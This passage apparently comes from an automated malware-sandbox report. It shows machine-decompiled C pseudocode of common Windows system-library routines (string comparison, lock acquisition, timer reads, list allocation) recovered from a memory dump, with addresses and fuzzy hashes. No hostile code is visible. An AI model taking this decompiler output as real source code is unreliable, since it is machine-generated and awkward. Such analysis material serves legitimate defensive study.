				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x46e8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x46e8208; // 0x46e8207
				_t8 = _t57 + 0x46e8208; // 0x46e8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x46e8450; // 0x93365a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x46e821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x46e6d5c; // 0x7f570654
							_t72 =  *0x46e6d5c; // 0x7f570654
							_t75 =  *0x46e6d5c; // 0x7f570654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x46e6d5c; // 0x7f570654
							_t84 =  *0x46e6d5c; // 0x7f570654
							_t87 =  *0x46e6d5c; // 0x7f570654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0463F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x04622ae4
0x04622aec
0x04622aef
0x04622af4
0x04622af7
0x04622afd
0x04622b92
0x04622b92
0x04622b97
0x04622b9c
0x04622b9c
0x04622b03
0x04622b06
0x04622b09
0x04622b09
0x04622b0f
0x04622b15
0x04622b15
0x04622b1b
0x04622b1e
0x04622b21
0x04622b26
0x04622b29
0x04622b81
0x04622b84
0x04622c0e
0x04622c15
0x04622c24
0x04622c24
0x04622b8a
0x04622b8a
0x04622b8a
0x04622b8a
0x04622b90
0x00000000
0x00000000
0x00000000
0x00000000
0x04622b4a
0x04622b4a
0x04622b4d
0x04622b53
0x00000000
0x00000000
0x04622b55
0x04622b58
0x04622bb7
0x04665d1b
0x04665d37
0x04665d47
0x04665d53
0x04622bbd
0x04622bbd
0x04622bbd
0x04622bb7
0x04622b5d
0x04622c2f
0x04665d5b
0x04665d77
0x04665d87
0x04665d93
0x04622c35
0x04622c35
0x04622c35
0x04622c2f
0x04622b65
0x04622b9f
0x04622ba2
0x04622b67
0x04622b67
0x04622b69
0x04622b6b
0x04622b6e
0x04622bc9
0x04622bcc
0x04622bcf
0x04622bd4
0x04622bd6
0x04622bd6
0x04622bdb
0x04622c02
0x04622c05
0x04622c07
0x00000000
0x04622c07
0x04622be0
0x04622c00
0x04622c3f
0x04622c3f
0x00000000
0x04622c00
0x04622be5
0x04622be7
0x04622bec
0x04622bf4
0x04622bf6
0x00000000
0x04622bf6
0x04622b70
0x04622b76
0x04622b2b
0x04622b2b
0x04622b2d
0x04622b2f
0x04622b32
0x04622b35
0x04622b3a
0x00000000
0x04622b40
0x04622b43
0x04622b45
0x04622b47
0x04622b4a
0x04622b4d
0x04622b53
0x00000000
0x00000000
0x00000000
0x04622b53
0x04622b78
0x04622b78
0x04622b7b
0x04622b7e
0x00000000
0x04622b7e
0x04622b76
0x04622ba5
0x04622ba5
0x04622ba8
0x04622bad
0x00000000
0x00000000
0x04622baf
0x04622baf
0x04622bc2
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99febb2118a61846d55598ee8a316e71525d87d61db35ae9a48c7ced78db8f84
Instruction ID: 8cc02cb45ccba85034681a51d220a75256edc35184b5d8f830e9ed0908e0bf65
Opcode Fuzzy Hash: 99febb2118a61846d55598ee8a316e71525d87d61db35ae9a48c7ced78db8f84
Instruction Fuzzy Hash: 3151CE76B00525DFCB18CF19C9A08BDB7F1FB98705705849AE846AB350F634BA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 046BAE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E046BAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E046BC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E046BACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E046BFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E046BEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E04617D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E046B1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E046C1536(0x46e8ae4, (_t74 -  *0x46e8b04 >> 0x14) + (_t74 -  *0x46e8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L046BC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E046BA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0469CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E046BACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x046bae44
0x046bae4c
0x046bae53
0x046bae55
0x046bae5c
0x046bae64
0x046bae68
0x046bae75
0x046bae75
0x046bae78
0x046bae7a
0x046bae7c
0x046bae7f
0x046baea8
0x046baeab
0x046baead
0x00000000
0x00000000
0x046baeb3
0x046baeb8
0x046baebb
0x046baebd
0x00000000
0x046bae81
0x046bae88
0x046bae8f
0x046bae9b
0x046bae96
0x046bae96
0x046bae96
0x046baea0
0x046baea3
0x046baebf
0x046baebf
0x046baec3
0x046baec9
0x046baf0d
0x046baf14
0x046baf3d
0x046baf3d
0x046baf41
0x046baf44
0x046baf67
0x046baf67
0x046baf6a
0x046bafca
0x046bafd1
0x00000000
0x046bafd1
0x046baf6c
0x046baf6d
0x046baf75
0x046baf7c
0x046baf7e
0x046baf80
0x046baf85
0x046baf87
0x046baf99
0x046baf89
0x046baf92
0x046baf92
0x046baf9e
0x046bafa1
0x046bafa3
0x046bafa9
0x046bafb0
0x046bafb2
0x046bafb4
0x046bafbc
0x046bafbc
0x046bafb4
0x046bafb0
0x00000000
0x046bafa1
0x046baf4f
0x046baf57
0x046baf5c
0x046baf5e
0x00000000
0x00000000
0x046baf60
0x046baf64
0x046baf64
0x00000000
0x046baf64
0x046baf1a
0x046baf25
0x00000000
0x00000000
0x046baf27
0x046baf28
0x046baf33
0x00000000
0x046baed0
0x046baed0
0x046baed2
0x046baee1
0x046baee4
0x00000000
0x00000000
0x046baee6
0x046baeec
0x00000000
0x00000000
0x046baefb
0x046baf07
0x046bafd3
0x046bafdb
0x046bafdb
0x00000000
0x046baf07
0x046baed6
0x046baed8
0x046baedf
0x00000000
0x00000000
0x00000000
0x046baedf
0x046baec9

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff046bdcd7163396ad5364416ba3377fa9ba8bbede1253a4dca05366aa97da2
Instruction ID: d97a34b947d05673d5e3e95846e487174d30cba02a902cdf0f4e393a5c3db006
Opcode Fuzzy Hash: 1ff046bdcd7163396ad5364416ba3377fa9ba8bbede1253a4dca05366aa97da2
Instruction Fuzzy Hash: D541B0B17002119BDB269A69C894AFBB39AAB94724F04421DF89687390F734F882D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0461DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0461DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E045FCC50(E045F4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04617D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E046C8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04612280(_t58, _v44);
						E0461DD82(_v44, _t102, _t98);
						E0461B944(_t102, _v5);
						return E0460FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x46e8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x46e862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x46e8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x46e862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x46bfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0461dbe9
0x0461dbf2
0x0461dbf7
0x0461dbf9
0x0461dbfc
0x0461dc00
0x0461dc03
0x0461dc14
0x0461dd54
0x0461dd54
0x0461dd54
0x0461dc18
0x0461dc1d
0x0461dc1d
0x0461dc32
0x0461dc3b
0x0461dc3e
0x0461dc46
0x0461dd5b
0x0461dd62
0x0461dd64
0x0461dd67
0x0461dd69
0x0461dd6b
0x0461dd6e
0x0461dd70
0x0461dd73
0x0461dd73
0x00000000
0x0461dc4c
0x0461dc4e
0x04663ae3
0x04663ae8
0x04663aea
0x0461dce7
0x0461dce9
0x0461dcec
0x0461dcee
0x0461dcf0
0x0461dcf3
0x0461dcf5
0x04663af2
0x04663af5
0x04663af5
0x0461dd06
0x0461dd08
0x0461dd0b
0x0461dd12
0x04663b08
0x0461dd18
0x0461dd18
0x0461dd18
0x0461dd20
0x0461dd23
0x04663b16
0x04663b16
0x0461dd29
0x0461dd2d
0x0461dd36
0x0461dd40
0x0461dd51
0x0461dd51
0x0461dc54
0x0461dc59
0x0461dc59
0x0461dc5e
0x0461dc5e
0x0461dc63
0x0461dc66
0x0461dc6b
0x0461dc78
0x0461dc7b
0x0461dc81
0x0461dc81
0x0461dc83
0x0461dc89
0x00000000
0x00000000
0x0461dd7b
0x0461dd7b
0x0461dc8f
0x0461dc8f
0x0461dc92
0x0461dc99
0x0461dc9f
0x0461dca5
0x0461dcaa
0x0461dcaa
0x0461dcb3
0x0461dcb8
0x0461dcbb
0x0461dcc1
0x0461dccf
0x0461dcd2
0x0461dcd5
0x0461dcd7
0x0461dcda
0x0461dcdc
0x0461dcdc
0x0461dce2
0x0461dce4
0x00000000
0x0461dce4

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef07e07ba7d149ec1a77101333ed546c572d94ec719925ac1936c562e29a192d
Instruction ID: 2f90a3d351e62ddd63246135dacb032408d8fd129e8be25482cd839ed715cc5d
Opcode Fuzzy Hash: ef07e07ba7d149ec1a77101333ed546c572d94ec719925ac1936c562e29a192d
Instruction Fuzzy Hash: 3B519BB1E00605DFCB14DFA8C480AAEBBF5FB88310F28855AD955AB350FB34B944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0460EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0460EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E045F9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x772ac21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E045F2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0460ef4b
0x0460ef4d
0x0460ef57
0x0460f0bd
0x0460f0c2
0x0460f0d2
0x0460f0d2
0x0460f0c2
0x0460ef5d
0x0460ef5f
0x0460ef67
0x0460ef6a
0x0460ef6d
0x0460ef74
0x0460ef7f
0x0460ef82
0x0460ef82
0x0460ef86
0x0460ef88
0x0460ef8c
0x0460ef8f
0x0460ef8f
0x0460ef8f
0x00000000
0x0460ef91
0x0460ef93
0x0460efc4
0x0460efc4
0x0460efc4
0x0460efca
0x0460efd0
0x0460f0a6
0x00000000
0x00000000
0x0460f0af
0x0465bb06
0x0465bb0a
0x0460f0b5
0x0460f0b5
0x0460f0b5
0x0460f0b5
0x00000000
0x0460efd6
0x0460efd9
0x0460f0de
0x0460f0e2
0x0460efdf
0x0460efdf
0x0460efdf
0x0460efe5
0x0465bafc
0x0465bafc
0x0460efe5
0x0460efeb
0x0460efed
0x0460f00f
0x0460f011
0x0460f01a
0x0460f01d
0x0460f021
0x0460f028
0x0460f029
0x0460f029
0x0460f02c
0x00000000
0x0460f02c
0x0460eff3
0x0460eff9
0x0460f0ea
0x0460f0ed
0x0460f0ef
0x00000000
0x0460f0ef
0x0460f003
0x0465bb12
0x0460f045
0x0460f049
0x0460f051
0x0460f09e
0x0460f0a0
0x0460f0a0
0x0460f09e
0x0460f053
0x0460f064
0x0460f064
0x0460f06b
0x0465bb1a
0x0465bb1a
0x0460f071
0x0460f071
0x0460f07d
0x0460f082
0x0460f08f
0x0460f08f
0x0460f009
0x0460f00d
0x00000000
0x0460f00d
0x0460efd0
0x0460ef97
0x0460efa5
0x0460efaa
0x00000000
0x0460efac
0x0460efac
0x0460efac
0x00000000
0x0460efb2
0x0460f036
0x0460f03a
0x0460f040
0x0460f090
0x00000000
0x0460f092
0x0460f042
0x00000000
0x0460f042
0x0460efb7
0x0460efb9
0x0460efbc
0x0460efb0
0x0460efb0
0x00000000
0x0460efbe
0x0460efbe
0x0460efc1
0x00000000
0x0460efc1
0x0460efbc
0x0460efaa
0x0460ef91

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 75c3c5d4ab3892cc9531d5f058ce18bf57a7763cd70d82cee48c38aa0bd69fd3
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 6351E230A042559BDB2CCF68C1A07AFBBB1AF15314F18C1A8D646973C1F7B6B989D741

Uniqueness

Uniqueness Score: -1.00%

Function 046C740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E046C740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0464D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0463F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04614620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04614620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0463F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04614620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
